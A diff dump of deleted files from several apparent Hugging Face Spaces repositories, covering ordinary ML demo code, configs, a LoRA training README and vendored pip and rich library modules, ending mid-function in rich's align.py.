do_denormalize = [not has_nsfw for has_nsfw in has_nsfw_concept]
|
760 |
-
|
761 |
-
image = self.image_processor.postprocess(image, output_type=output_type, do_denormalize=do_denormalize)
|
762 |
-
|
763 |
-
# Offload last model to CPU
|
764 |
-
if hasattr(self, "final_offload_hook") and self.final_offload_hook is not None:
|
765 |
-
self.final_offload_hook.offload()
|
766 |
-
|
767 |
-
if not return_dict:
|
768 |
-
return (image, has_nsfw_concept)
|
769 |
-
|
770 |
-
return StableDiffusionPipelineOutput(images=image, nsfw_content_detected=has_nsfw_concept)
|
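The core of the parallel sampling loop above is the window-advance rule: compute per-position error ratios against the tolerance, then slide the batch window one past the first position that fails. A minimal scalar sketch of just that rule, ignoring the batch and latent dimensions (the function name and plain-list input are illustrative, not the pipeline's API):

```python
def advance_window(error_ratio, scaled_tolerance, begin_idx, parallel, num_timesteps):
    # error_ratio: one squared-error ratio per window position, already reduced
    # over the batch. The pipeline pads with 1e9 so argmax always finds a failing
    # index; here a default of len(error_ratio) plays the same role.
    ind = len(error_ratio)
    for i, e in enumerate(error_ratio):
        if e > scaled_tolerance:
            ind = i  # first position whose error exceeds the tolerance
            break
    # slide up to one past the first failing position, capped at `parallel`
    new_begin_idx = begin_idx + min(1 + ind, parallel)
    new_end_idx = min(new_begin_idx + parallel, num_timesteps)
    return new_begin_idx, new_end_idx
```

When every position passes, the window jumps a full `parallel` steps; even a failure at position 0 still advances by one step, which is what guarantees the loop terminates.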
spaces/Andy1621/uniformer_image_segmentation/configs/deeplabv3/deeplabv3_r101-d8_480x480_40k_pascal_context.py
DELETED
@@ -1,2 +0,0 @@
_base_ = './deeplabv3_r50-d8_480x480_40k_pascal_context.py'
model = dict(pretrained='open-mmlab://resnet101_v1c', backbone=dict(depth=101))
spaces/AnishKumbhar/ChatBot/text-generation-webui-main/extensions/Training_PRO/README.md
DELETED
@@ -1,56 +0,0 @@
# Training_PRO

This is an expanded Training tab, maintained by FP.

https://github.com/FartyPants/Training_PRO

- Chunking: precise raw text slicer (PRTS) uses sentence slicing and makes sure things are clean on all ends
- Overlap chunking - this special overlapping will make an additional overlap block based on logical rules (i.e. no overlap block on a hard cut)
- Custom scheduler (follow the code to make your own). In LR Scheduler select FP_low_epoch_annealing - this scheduler keeps the LR constant for the first epoch, then uses cosine for the rest - this part would be best spawned into a new py file
- Saves a graph PNG file at the end with learning rate and loss per epoch
- Adding EOS to each block or to hard cuts only
- Automatically lowers gradient accumulation if you go overboard and set a gradient accumulation higher than the actual data - transformers would then throw an error (or they used to; not sure if that is still true), but either way it will fix bad data
- Turn BOS on and off
- Target selector
- DEMENTOR LEARNING (experimental): Deep Memorization Enforcement Through Overlapping and Repetition. This is an experiment for long-text learning using low epochs (basically use 1 epoch with constant LR, or 2 epochs with the FP_low_epoch_annealing LR scheduler)
- Getting rid of micro batch size/batch size confusion. Now there is a True Batch Size slider and a Gradient Accumulation slider, consistent with all the other training out there
- Ability to save a checkpoint during training with a button
- Ability to change Stop Loss during training
- Different modes of checkpoint auto-saving
- Function to check the dataset and suggest parameters such as warmup and checkpoint save frequency before training

### Notes:

This uses its own chunking code for raw text based on sentence splitting. This will avoid weird cuts in the chunks, and each chunk should now start and end on a sentence boundary. It works hand in hand with Hard Cut. A proper use is to structure your text into logical blocks (ideas) separated by three \n, then use three \n in Hard Cut. This way each chunk will contain only one flow of ideas and not derail in the thoughts. And the overlapping code will create overlapped blocks on a sentence basis too, but will not cross a hard cut, thus not crossing different ideas either. Does it make any sense? No? Hmmmm...

### Targets

Normal LoRA is q, v, and that's what you should use. You can use (q k v o) or (q k v) and it will give you a lot more trainable parameters. The benefit is that you can keep the rank lower and still attain the same coherency as q v with a high rank. Guanaco has been trained with QLoRA and q k v o, for example, and they swear by it.

### DEMENTOR LEARNING (experimental) Deep Memorization Enforcement Through Overlapping and Repetition

This is an experimental chunking mode to train long-form text in a low number of epochs (basically 1) with sliding repetition. The depth of learning directly depends on the cutoff_length. Increasing the cutoff length will also increase the number of blocks created from long-form text (which is contrary to normal training). It is based on my own wild experiments.

### Getting rid of batch size and micro batch size

Keeping consistency with everyone else.

Listen, there is only ONE batch size - the True Batch Size (called micro-batch size previously in WebUI) - this is how many blocks are processed at once (during a single step). It eats GPU, but it really helps with quality training (in fact the ideal batch size would be the same as the number of blocks - which is unrealistic) - so the idea is to cram in as much True Batch Size as you can before your GPU blows with OOM. On 24 GB this is about 10 for 13b (loaded with 4-bit).

So no micro batch size - it is now called True Batch Size, because that's what it is.

The other thing is Gradient Accumulation - this is an emulation of the above batch size - a virtual batch size, if you will. If your GPU can't handle the real batch size, then you may fake it using Gradient Accumulation. This will accumulate the gradients over however many steps are defined here and then update the weights at the end, without an increase in GPU use.
Gradient accumulation is like a virtual batch size multiplier without the GPU penalty.

If your batch size is 4 and your gradient accumulation is 2, then it sort of behaves as if we have a batch size of 8. *Sort of* because batch size 4 with GA 2 is NOT the same as batch size 2 with GA 4 (it produces different weights - hence it's not an equivalent). The idea is that if your GPU can't handle a bigger batch, using GA to extend the batch size is the next best thing (good enough) since you have no other choice.

If all you can afford is a batch size of 1, then increasing GA will likely make the learning better in some range of GA (it's not always true that more is better).

However, GA is not some golden goose. As said, it isn't the same as batch size. In fact GA may worsen your learning as well.

I would suggest a series of experiments where you put the batch size as high as possible without OOM, set GA to 1, then repeat training while increasing the GA (2, 4...), and see how the model changes. It's likely that it will follow some sort of curve where GA will seem to help before it makes things worse. Some people believe that if you can squeeze in a batch size of 6, then you should not bother with GA at all... YMMV.

High batch size vs. high GA would also likely produce different results in terms of learning words vs. style. How? Hmmmm... good question.

One optical "benefit" of GA is that the loss will fluctuate less (because of all the gradient accumulation, which works as a form of noise smoothing as well).
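The accumulation mechanics described above can be sketched in a few lines; the function names are illustrative, and the scalar "gradients" stand in for real per-parameter tensors:

```python
def sgd_update(w, grads, lr=0.1):
    # one weight update using the mean of the accumulated micro-batch gradients
    return w - lr * sum(grads) / len(grads)

def train(w, micro_batch_grads, grad_accum, lr=0.1):
    # collect `grad_accum` micro-batch gradients, then take a single step,
    # emulating a batch `grad_accum` times larger without extra GPU memory
    acc = []
    for g in micro_batch_grads:
        acc.append(g)
        if len(acc) == grad_accum:
            w = sgd_update(w, acc, lr)
            acc = []
    return w
```

This is why GA behaves like a virtual batch-size multiplier: all `grad_accum` gradients are evaluated at the same weights before the single update, whereas `grad_accum` separate small-batch steps would each move the weights first.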
spaces/AnishKumbhar/ChatBot/text-generation-webui-main/extensions/openai/edits.py
DELETED
@@ -1,101 +0,0 @@
import time

import yaml
from extensions.openai.defaults import get_default_req_params
from extensions.openai.errors import InvalidRequestError
from extensions.openai.utils import debug_msg
from modules import shared
from modules.text_generation import encode, generate_reply


def edits(instruction: str, input: str, temperature=1.0, top_p=1.0) -> dict:

    created_time = int(time.time() * 1000)

    # Request parameters
    req_params = get_default_req_params()
    stopping_strings = []

    # Alpaca is verbose so a good default prompt
    default_template = (
        "Below is an instruction that describes a task, paired with an input that provides further context. "
        "Write a response that appropriately completes the request.\n\n"
        "### Instruction:\n{instruction}\n\n### Input:\n{input}\n\n### Response:\n"
    )

    instruction_template = default_template

    # Use the special instruction/input/response template for anything trained like Alpaca
    if shared.settings['instruction_template']:
        if 'Alpaca' in shared.settings['instruction_template']:
            stopping_strings.extend(['\n###'])
        else:
            try:
                instruct = yaml.safe_load(open(f"instruction-templates/{shared.settings['instruction_template']}.yaml", 'r'))

                template = instruct['turn_template']
                template = template\
                    .replace('<|user|>', instruct.get('user', ''))\
                    .replace('<|bot|>', instruct.get('bot', ''))\
                    .replace('<|user-message|>', '{instruction}\n{input}')

                instruction_template = instruct.get('context', '') + template[:template.find('<|bot-message|>')].rstrip(' ')
                if instruct['user']:
                    stopping_strings.extend(['\n' + instruct['user'], instruct['user']])

            except Exception as e:
                instruction_template = default_template
                print(f"Exception: When loading instruction-templates/{shared.settings['instruction_template']}.yaml: {repr(e)}")
                print("Warning: Loaded default instruction-following template (Alpaca) for model.")
    else:
        stopping_strings.extend(['\n###'])
        print("Warning: Loaded default instruction-following template (Alpaca) for model.")

    edit_task = instruction_template.format(instruction=instruction, input=input)

    truncation_length = shared.settings['truncation_length']

    token_count = len(encode(edit_task)[0])
    max_tokens = truncation_length - token_count

    if max_tokens < 1:
        err_msg = f"This model maximum context length is {truncation_length} tokens. However, your messages resulted in over {truncation_length - max_tokens} tokens."
        raise InvalidRequestError(err_msg, param='input')

    req_params['max_new_tokens'] = max_tokens
    req_params['truncation_length'] = truncation_length
    req_params['temperature'] = temperature
    req_params['top_p'] = top_p
    req_params['seed'] = shared.settings.get('seed', req_params['seed'])
    req_params['add_bos_token'] = shared.settings.get('add_bos_token', req_params['add_bos_token'])
    req_params['custom_stopping_strings'] = shared.settings['custom_stopping_strings']

    debug_msg({'edit_template': edit_task, 'req_params': req_params, 'token_count': token_count})

    generator = generate_reply(edit_task, req_params, stopping_strings=stopping_strings, is_chat=False)

    answer = ''
    for a in generator:
        answer = a

    # some replies have an extra leading space to fit the instruction template, just clip it off from the reply.
    if edit_task[-1] != '\n' and answer and answer[0] == ' ':
        answer = answer[1:]

    completion_token_count = len(encode(answer)[0])

    resp = {
        "object": "edit",
        "created": created_time,
        "choices": [{
            "text": answer,
            "index": 0,
        }],
        "usage": {
            "prompt_tokens": token_count,
            "completion_tokens": completion_token_count,
            "total_tokens": token_count + completion_token_count
        }
    }

    return resp
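The default Alpaca template in the code above is an ordinary `str.format` string; a standalone sketch of how `edit_task` gets assembled (the instruction and input values here are made up):

```python
# the Alpaca-style template copied from the code above
default_template = (
    "Below is an instruction that describes a task, paired with an input that provides further context. "
    "Write a response that appropriately completes the request.\n\n"
    "### Instruction:\n{instruction}\n\n### Input:\n{input}\n\n### Response:\n"
)

# filling in the placeholders produces the prompt sent to generate_reply
edit_task = default_template.format(instruction="Fix the typo", input="Helo world")
```

Because the template ends with `"### Response:\n"`, the model's continuation starts exactly where the response belongs, and `'\n###'` makes a natural stopping string.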
spaces/Anonymous-sub/Rerender/ControlNet/annotator/uniformer/mmcv/video/__init__.py
DELETED
@@ -1,11 +0,0 @@
# Copyright (c) OpenMMLab. All rights reserved.
from .io import Cache, VideoReader, frames2video
from .optflow import (dequantize_flow, flow_from_bytes, flow_warp, flowread,
                      flowwrite, quantize_flow, sparse_flow_from_bytes)
from .processing import concat_video, convert_video, cut_video, resize_video

__all__ = [
    'Cache', 'VideoReader', 'frames2video', 'convert_video', 'resize_video',
    'cut_video', 'concat_video', 'flowread', 'flowwrite', 'quantize_flow',
    'dequantize_flow', 'flow_warp', 'flow_from_bytes', 'sparse_flow_from_bytes'
]
spaces/Anonymous-sub/Rerender/ControlNet/gradio_normal2image.py
DELETED
@@ -1,99 +0,0 @@
-from share import *
-import config
-
-import cv2
-import einops
-import gradio as gr
-import numpy as np
-import torch
-import random
-
-from pytorch_lightning import seed_everything
-from annotator.util import resize_image, HWC3
-from annotator.midas import MidasDetector
-from cldm.model import create_model, load_state_dict
-from cldm.ddim_hacked import DDIMSampler
-
-
-apply_midas = MidasDetector()
-
-model = create_model('./models/cldm_v15.yaml').cpu()
-model.load_state_dict(load_state_dict('./models/control_sd15_normal.pth', location='cuda'))
-model = model.cuda()
-ddim_sampler = DDIMSampler(model)
-
-
-def process(input_image, prompt, a_prompt, n_prompt, num_samples, image_resolution, detect_resolution, ddim_steps, guess_mode, strength, scale, seed, eta, bg_threshold):
-    with torch.no_grad():
-        input_image = HWC3(input_image)
-        _, detected_map = apply_midas(resize_image(input_image, detect_resolution), bg_th=bg_threshold)
-        detected_map = HWC3(detected_map)
-        img = resize_image(input_image, image_resolution)
-        H, W, C = img.shape
-
-        detected_map = cv2.resize(detected_map, (W, H), interpolation=cv2.INTER_LINEAR)
-
-        control = torch.from_numpy(detected_map[:, :, ::-1].copy()).float().cuda() / 255.0
-        control = torch.stack([control for _ in range(num_samples)], dim=0)
-        control = einops.rearrange(control, 'b h w c -> b c h w').clone()
-
-        if seed == -1:
-            seed = random.randint(0, 65535)
-        seed_everything(seed)
-
-        if config.save_memory:
-            model.low_vram_shift(is_diffusing=False)
-
-        cond = {"c_concat": [control], "c_crossattn": [model.get_learned_conditioning([prompt + ', ' + a_prompt] * num_samples)]}
-        un_cond = {"c_concat": None if guess_mode else [control], "c_crossattn": [model.get_learned_conditioning([n_prompt] * num_samples)]}
-        shape = (4, H // 8, W // 8)
-
-        if config.save_memory:
-            model.low_vram_shift(is_diffusing=True)
-
-        model.control_scales = [strength * (0.825 ** float(12 - i)) for i in range(13)] if guess_mode else ([strength] * 13)  # Magic number. IDK why. Perhaps because 0.825**12<0.01 but 0.826**12>0.01
-        samples, intermediates = ddim_sampler.sample(ddim_steps, num_samples,
-                                                     shape, cond, verbose=False, eta=eta,
-                                                     unconditional_guidance_scale=scale,
-                                                     unconditional_conditioning=un_cond)
-
-        if config.save_memory:
-            model.low_vram_shift(is_diffusing=False)
-
-        x_samples = model.decode_first_stage(samples)
-        x_samples = (einops.rearrange(x_samples, 'b c h w -> b h w c') * 127.5 + 127.5).cpu().numpy().clip(0, 255).astype(np.uint8)
-
-        results = [x_samples[i] for i in range(num_samples)]
-    return [detected_map] + results
-
-
-block = gr.Blocks().queue()
-with block:
-    with gr.Row():
-        gr.Markdown("## Control Stable Diffusion with Normal Maps")
-    with gr.Row():
-        with gr.Column():
-            input_image = gr.Image(source='upload', type="numpy")
-            prompt = gr.Textbox(label="Prompt")
-            run_button = gr.Button(label="Run")
-            with gr.Accordion("Advanced options", open=False):
-                num_samples = gr.Slider(label="Images", minimum=1, maximum=12, value=1, step=1)
-                image_resolution = gr.Slider(label="Image Resolution", minimum=256, maximum=768, value=512, step=64)
-                strength = gr.Slider(label="Control Strength", minimum=0.0, maximum=2.0, value=1.0, step=0.01)
-                guess_mode = gr.Checkbox(label='Guess Mode', value=False)
-                detect_resolution = gr.Slider(label="Normal Resolution", minimum=128, maximum=1024, value=384, step=1)
-                bg_threshold = gr.Slider(label="Normal background threshold", minimum=0.0, maximum=1.0, value=0.4, step=0.01)
-                ddim_steps = gr.Slider(label="Steps", minimum=1, maximum=100, value=20, step=1)
-                scale = gr.Slider(label="Guidance Scale", minimum=0.1, maximum=30.0, value=9.0, step=0.1)
-                seed = gr.Slider(label="Seed", minimum=-1, maximum=2147483647, step=1, randomize=True)
-                eta = gr.Number(label="eta (DDIM)", value=0.0)
-                a_prompt = gr.Textbox(label="Added Prompt", value='best quality, extremely detailed')
-                n_prompt = gr.Textbox(label="Negative Prompt",
-                                      value='longbody, lowres, bad anatomy, bad hands, missing fingers, extra digit, fewer digits, cropped, worst quality, low quality')
-        with gr.Column():
-            result_gallery = gr.Gallery(label='Output', show_label=False, elem_id="gallery").style(grid=2, height='auto')
-    ips = [input_image, prompt, a_prompt, n_prompt, num_samples, image_resolution, detect_resolution, ddim_steps, guess_mode, strength, scale, seed, eta, bg_threshold]
-    run_button.click(fn=process, inputs=ips, outputs=[result_gallery])
-
-
-block.launch(server_name='0.0.0.0')
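The `model.control_scales` line in the deleted script builds the Guess Mode schedule: a geometric ramp over the 13 ControlNet output blocks, strongest at the deepest block. A minimal, model-free sketch of just that arithmetic (variable names here are illustrative, not from the script):

```python
# Guess Mode ramps control strength geometrically across the 13 ControlNet
# blocks (shallow -> deep); normal mode applies the same strength everywhere.
strength = 1.0
guess_scales = [strength * (0.825 ** float(12 - i)) for i in range(13)]
uniform_scales = [strength] * 13

print(guess_scales[-1])  # deepest block keeps full strength: 1.0
print(guess_scales[0])   # shallowest block is heavily damped: 0.825 ** 12
```

The schedule is strictly increasing with depth, so shallow blocks barely steer the diffusion while the deepest block applies the full user-chosen strength.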
spaces/Archan/ArXivAudio/get_pages.py
DELETED
@@ -1,21 +0,0 @@
-from pdfminer.high_level import extract_text, extract_pages
-from pdfminer.layout import LTTextContainer
-from preprocess import pre_process
-
-
-def get_pages(filename, start_page=0, end_page=0):
-    page_number = []
-    for i in range(start_page, end_page+1):
-        page_number.append(i-1)
-    print(page_number)
-    #filename = str(paper.title)+'.pdf'
-    pages = extract_pages(filename, page_numbers=page_number)
-
-    content = ""
-    for page_layout in pages:
-        for element in page_layout:
-            if isinstance(element, LTTextContainer):
-                content = content+element.get_text()
-    content = pre_process(content)
-
-    return content
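The deleted helper maps a 1-based inclusive page range onto pdfminer's 0-based `page_numbers` list. A standalone sketch of just that conversion (the function name is hypothetical, not from the repo):

```python
def pages_to_indices(start_page, end_page):
    """Convert a 1-based inclusive page range to pdfminer's 0-based indices,
    mirroring the loop at the top of the deleted get_pages() helper."""
    return [i - 1 for i in range(start_page, end_page + 1)]

print(pages_to_indices(1, 3))  # [0, 1, 2]
print(pages_to_indices(5, 5))  # [4]
```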
spaces/Ataturk-Chatbot/HuggingFaceChat/venv/lib/python3.11/site-packages/pip/_internal/resolution/resolvelib/reporter.py
DELETED
@@ -1,80 +0,0 @@
-from collections import defaultdict
-from logging import getLogger
-from typing import Any, DefaultDict
-
-from pip._vendor.resolvelib.reporters import BaseReporter
-
-from .base import Candidate, Requirement
-
-logger = getLogger(__name__)
-
-
-class PipReporter(BaseReporter):
-    def __init__(self) -> None:
-        self.reject_count_by_package: DefaultDict[str, int] = defaultdict(int)
-
-        self._messages_at_reject_count = {
-            1: (
-                "pip is looking at multiple versions of {package_name} to "
-                "determine which version is compatible with other "
-                "requirements. This could take a while."
-            ),
-            8: (
-                "pip is looking at multiple versions of {package_name} to "
-                "determine which version is compatible with other "
-                "requirements. This could take a while."
-            ),
-            13: (
-                "This is taking longer than usual. You might need to provide "
-                "the dependency resolver with stricter constraints to reduce "
-                "runtime. See https://pip.pypa.io/warnings/backtracking for "
-                "guidance. If you want to abort this run, press Ctrl + C."
-            ),
-        }
-
-    def rejecting_candidate(self, criterion: Any, candidate: Candidate) -> None:
-        self.reject_count_by_package[candidate.name] += 1
-
-        count = self.reject_count_by_package[candidate.name]
-        if count not in self._messages_at_reject_count:
-            return
-
-        message = self._messages_at_reject_count[count]
-        logger.info("INFO: %s", message.format(package_name=candidate.name))
-
-        msg = "Will try a different candidate, due to conflict:"
-        for req_info in criterion.information:
-            req, parent = req_info.requirement, req_info.parent
-            # Inspired by Factory.get_installation_error
-            msg += "\n    "
-            if parent:
-                msg += f"{parent.name} {parent.version} depends on "
-            else:
-                msg += "The user requested "
-            msg += req.format_for_error()
-        logger.debug(msg)
-
-
-class PipDebuggingReporter(BaseReporter):
-    """A reporter that does an info log for every event it sees."""
-
-    def starting(self) -> None:
-        logger.info("Reporter.starting()")
-
-    def starting_round(self, index: int) -> None:
-        logger.info("Reporter.starting_round(%r)", index)
-
-    def ending_round(self, index: int, state: Any) -> None:
-        logger.info("Reporter.ending_round(%r, state)", index)
-
-    def ending(self, state: Any) -> None:
-        logger.info("Reporter.ending(%r)", state)
-
-    def adding_requirement(self, requirement: Requirement, parent: Candidate) -> None:
-        logger.info("Reporter.adding_requirement(%r, %r)", requirement, parent)
-
-    def rejecting_candidate(self, criterion: Any, candidate: Candidate) -> None:
-        logger.info("Reporter.rejecting_candidate(%r, %r)", criterion, candidate)
-
-    def pinning(self, candidate: Candidate) -> None:
-        logger.info("Reporter.pinning(%r)", candidate)
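`PipReporter` above only logs when a package's rejection count hits one of the keys in `_messages_at_reject_count` (1, 8, 13). A stripped-down sketch of that throttling pattern, runnable without pip (the message strings and package name here are placeholders):

```python
from collections import defaultdict

# Throttled reporting: emit a message only when a package's rejection
# count reaches one of the configured thresholds, mirroring PipReporter.
MESSAGES_AT = {1: "first backtrack", 8: "still backtracking", 13: "taking long"}

reject_counts = defaultdict(int)
emitted = []

def rejecting_candidate(name):
    reject_counts[name] += 1
    count = reject_counts[name]
    if count in MESSAGES_AT:
        emitted.append((name, MESSAGES_AT[count]))

for _ in range(9):
    rejecting_candidate("example-pkg")

print(emitted)  # fires only at counts 1 and 8
```

Nine rejections cross the first two thresholds but not the third, so exactly two messages fire; every other rejection returns silently.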
spaces/Ataturk-Chatbot/HuggingFaceChat/venv/lib/python3.11/site-packages/pkg_resources/_vendor/importlib_resources/_adapters.py
DELETED
@@ -1,170 +0,0 @@
-from contextlib import suppress
-from io import TextIOWrapper
-
-from . import abc
-
-
-class SpecLoaderAdapter:
-    """
-    Adapt a package spec to adapt the underlying loader.
-    """
-
-    def __init__(self, spec, adapter=lambda spec: spec.loader):
-        self.spec = spec
-        self.loader = adapter(spec)
-
-    def __getattr__(self, name):
-        return getattr(self.spec, name)
-
-
-class TraversableResourcesLoader:
-    """
-    Adapt a loader to provide TraversableResources.
-    """
-
-    def __init__(self, spec):
-        self.spec = spec
-
-    def get_resource_reader(self, name):
-        return CompatibilityFiles(self.spec)._native()
-
-
-def _io_wrapper(file, mode='r', *args, **kwargs):
-    if mode == 'r':
-        return TextIOWrapper(file, *args, **kwargs)
-    elif mode == 'rb':
-        return file
-    raise ValueError(
-        "Invalid mode value '{}', only 'r' and 'rb' are supported".format(mode)
-    )
-
-
-class CompatibilityFiles:
-    """
-    Adapter for an existing or non-existent resource reader
-    to provide a compatibility .files().
-    """
-
-    class SpecPath(abc.Traversable):
-        """
-        Path tied to a module spec.
-        Can be read and exposes the resource reader children.
-        """
-
-        def __init__(self, spec, reader):
-            self._spec = spec
-            self._reader = reader
-
-        def iterdir(self):
-            if not self._reader:
-                return iter(())
-            return iter(
-                CompatibilityFiles.ChildPath(self._reader, path)
-                for path in self._reader.contents()
-            )
-
-        def is_file(self):
-            return False
-
-        is_dir = is_file
-
-        def joinpath(self, other):
-            if not self._reader:
-                return CompatibilityFiles.OrphanPath(other)
-            return CompatibilityFiles.ChildPath(self._reader, other)
-
-        @property
-        def name(self):
-            return self._spec.name
-
-        def open(self, mode='r', *args, **kwargs):
-            return _io_wrapper(self._reader.open_resource(None), mode, *args, **kwargs)
-
-    class ChildPath(abc.Traversable):
-        """
-        Path tied to a resource reader child.
-        Can be read but doesn't expose any meaningful children.
-        """
-
-        def __init__(self, reader, name):
-            self._reader = reader
-            self._name = name
-
-        def iterdir(self):
-            return iter(())
-
-        def is_file(self):
-            return self._reader.is_resource(self.name)
-
-        def is_dir(self):
-            return not self.is_file()
-
-        def joinpath(self, other):
-            return CompatibilityFiles.OrphanPath(self.name, other)
-
-        @property
-        def name(self):
-            return self._name
-
-        def open(self, mode='r', *args, **kwargs):
-            return _io_wrapper(
-                self._reader.open_resource(self.name), mode, *args, **kwargs
-            )
-
-    class OrphanPath(abc.Traversable):
-        """
-        Orphan path, not tied to a module spec or resource reader.
-        Can't be read and doesn't expose any meaningful children.
-        """
-
-        def __init__(self, *path_parts):
-            if len(path_parts) < 1:
-                raise ValueError('Need at least one path part to construct a path')
-            self._path = path_parts
-
-        def iterdir(self):
-            return iter(())
-
-        def is_file(self):
-            return False
-
-        is_dir = is_file
-
-        def joinpath(self, other):
-            return CompatibilityFiles.OrphanPath(*self._path, other)
-
-        @property
-        def name(self):
-            return self._path[-1]
-
-        def open(self, mode='r', *args, **kwargs):
-            raise FileNotFoundError("Can't open orphan path")
-
-    def __init__(self, spec):
-        self.spec = spec
-
-    @property
-    def _reader(self):
-        with suppress(AttributeError):
-            return self.spec.loader.get_resource_reader(self.spec.name)
-
-    def _native(self):
-        """
-        Return the native reader if it supports files().
-        """
-        reader = self._reader
-        return reader if hasattr(reader, 'files') else self
-
-    def __getattr__(self, attr):
-        return getattr(self._reader, attr)
-
-    def files(self):
-        return CompatibilityFiles.SpecPath(self.spec, self._reader)
-
-
-def wrap_spec(package):
-    """
-    Construct a package spec with traversable compatibility
-    on the spec/loader/reader.
-    """
-    return SpecLoaderAdapter(package.__spec__, TraversableResourcesLoader)
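The `_io_wrapper` helper above dispatches on the requested mode: `'r'` wraps a binary stream in a text layer, `'rb'` passes it through unchanged, and anything else raises. A self-contained sketch of that dispatch, exercised against an in-memory stream (`io_wrapper` is a local copy for illustration, not the vendored function):

```python
from io import BytesIO, TextIOWrapper

def io_wrapper(file, mode='r', *args, **kwargs):
    # Same dispatch as the deleted _io_wrapper(): text-wrap binary streams
    # for 'r', pass them through untouched for 'rb', reject other modes.
    if mode == 'r':
        return TextIOWrapper(file, *args, **kwargs)
    elif mode == 'rb':
        return file
    raise ValueError(
        "Invalid mode value '{}', only 'r' and 'rb' are supported".format(mode)
    )

text = io_wrapper(BytesIO(b"hello"), 'r').read()
raw = BytesIO(b"hello")
passthrough = io_wrapper(raw, 'rb')
print(text)                # 'hello' (decoded str, not bytes)
print(passthrough is raw)  # True: the 'rb' branch returns the same object
```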
spaces/Big-Web/MMSD/env/Lib/site-packages/pip/_vendor/chardet/metadata/__init__.py
DELETED
File without changes
spaces/Big-Web/MMSD/env/Lib/site-packages/pip/_vendor/rich/align.py
DELETED
@@ -1,311 +0,0 @@
-import sys
-from itertools import chain
-from typing import TYPE_CHECKING, Iterable, Optional
-
-if sys.version_info >= (3, 8):
-    from typing import Literal
-else:
-    from pip._vendor.typing_extensions import Literal  # pragma: no cover
-
-from .constrain import Constrain
-from .jupyter import JupyterMixin
-from .measure import Measurement
-from .segment import Segment
-from .style import StyleType
-
-if TYPE_CHECKING:
-    from .console import Console, ConsoleOptions, RenderableType, RenderResult
-
-AlignMethod = Literal["left", "center", "right"]
-VerticalAlignMethod = Literal["top", "middle", "bottom"]
-
-
-class Align(JupyterMixin):
-    """Align a renderable by adding spaces if necessary.
-
-    Args:
-        renderable (RenderableType): A console renderable.
-        align (AlignMethod): One of "left", "center", or "right""
-        style (StyleType, optional): An optional style to apply to the background.
-        vertical (Optional[VerticalAlginMethod], optional): Optional vertical align, one of "top", "middle", or "bottom". Defaults to None.
-        pad (bool, optional): Pad the right with spaces. Defaults to True.
-        width (int, optional): Restrict contents to given width, or None to use default width. Defaults to None.
-        height (int, optional): Set height of align renderable, or None to fit to contents. Defaults to None.
-
-    Raises:
-        ValueError: if ``align`` is not one of the expected values.
-    """
-
-    def __init__(
-        self,
-        renderable: "RenderableType",
-        align: AlignMethod = "left",
-        style: Optional[StyleType] = None,
-        *,
-        vertical: Optional[VerticalAlignMethod] = None,
-        pad: bool = True,
-        width: Optional[int] = None,
-        height: Optional[int] = None,
-    ) -> None:
-        if align not in ("left", "center", "right"):
-            raise ValueError(
-                f'invalid value for align, expected "left", "center", or "right" (not {align!r})'
-            )
-        if vertical is not None and vertical not in ("top", "middle", "bottom"):
-            raise ValueError(
-                f'invalid value for vertical, expected "top", "middle", or "bottom" (not {vertical!r})'
-            )
-        self.renderable = renderable
-        self.align = align
-        self.style = style
-        self.vertical = vertical
-        self.pad = pad
-        self.width = width
-        self.height = height
-
-    def __repr__(self) -> str:
-        return f"Align({self.renderable!r}, {self.align!r})"
-
-    @classmethod
-    def left(
-        cls,
-        renderable: "RenderableType",
-        style: Optional[StyleType] = None,
-        *,
-        vertical: Optional[VerticalAlignMethod] = None,
-        pad: bool = True,
-        width: Optional[int] = None,
-        height: Optional[int] = None,
-    ) -> "Align":
-        """Align a renderable to the left."""
-        return cls(
-            renderable,
-            "left",
-            style=style,
-            vertical=vertical,
-            pad=pad,
-            width=width,
-            height=height,
-        )
-
-    @classmethod
-    def center(
-        cls,
-        renderable: "RenderableType",
-        style: Optional[StyleType] = None,
-        *,
-        vertical: Optional[VerticalAlignMethod] = None,
-        pad: bool = True,
-        width: Optional[int] = None,
-        height: Optional[int] = None,
-    ) -> "Align":
-        """Align a renderable to the center."""
-        return cls(
-            renderable,
-            "center",
-            style=style,
-            vertical=vertical,
-            pad=pad,
-            width=width,
-            height=height,
-        )
-
-    @classmethod
-    def right(
-        cls,
-        renderable: "RenderableType",
-        style: Optional[StyleType] = None,
-        *,
-        vertical: Optional[VerticalAlignMethod] = None,
-        pad: bool = True,
-        width: Optional[int] = None,
-        height: Optional[int] = None,
-    ) -> "Align":
-        """Align a renderable to the right."""
-        return cls(
-            renderable,
-            "right",
-            style=style,
-            vertical=vertical,
-            pad=pad,
-            width=width,
-            height=height,
-        )
-
-    def __rich_console__(
-        self, console: "Console", options: "ConsoleOptions"
-    ) -> "RenderResult":
-        align = self.align
-        width = console.measure(self.renderable, options=options).maximum
-        rendered = console.render(
-            Constrain(
-                self.renderable, width if self.width is None else min(width, self.width)
-            ),
-            options.update(height=None),
-        )
-        lines = list(Segment.split_lines(rendered))
-        width, height = Segment.get_shape(lines)
-        lines = Segment.set_shape(lines, width, height)
-        new_line = Segment.line()
-        excess_space = options.max_width - width
-        style = console.get_style(self.style) if self.style is not None else None
-
-        def generate_segments() -> Iterable[Segment]:
-            if excess_space <= 0:
-                # Exact fit
-                for line in lines:
-                    yield from line
-                    yield new_line
-
-            elif align == "left":
-                # Pad on the right
-                pad = Segment(" " * excess_space, style) if self.pad else None
-                for line in lines:
-                    yield from line
-                    if pad:
-                        yield pad
-                    yield new_line
-
-            elif align == "center":
-                # Pad left and right
-                left = excess_space // 2
-                pad = Segment(" " * left, style)
-                pad_right = (
-                    Segment(" " * (excess_space - left), style) if self.pad else None
-                )
-                for line in lines:
-                    if left:
-                        yield pad
-                    yield from line
-                    if pad_right:
-                        yield pad_right
-                    yield new_line
-
-            elif align == "right":
-                # Padding on left
-                pad = Segment(" " * excess_space, style)
-                for line in lines:
-                    yield pad
-                    yield from line
-                    yield new_line
-
-        blank_line = (
-            Segment(f"{' ' * (self.width or options.max_width)}\n", style)
-            if self.pad
-            else Segment("\n")
-        )
-
-        def blank_lines(count: int) -> Iterable[Segment]:
-            if count > 0:
-                for _ in range(count):
-                    yield blank_line
-
-        vertical_height = self.height or options.height
-        iter_segments: Iterable[Segment]
-        if self.vertical and vertical_height is not None:
-            if self.vertical == "top":
-                bottom_space = vertical_height - height
-                iter_segments = chain(generate_segments(), blank_lines(bottom_space))
-            elif self.vertical == "middle":
-                top_space = (vertical_height - height) // 2
-                bottom_space = vertical_height - top_space - height
-                iter_segments = chain(
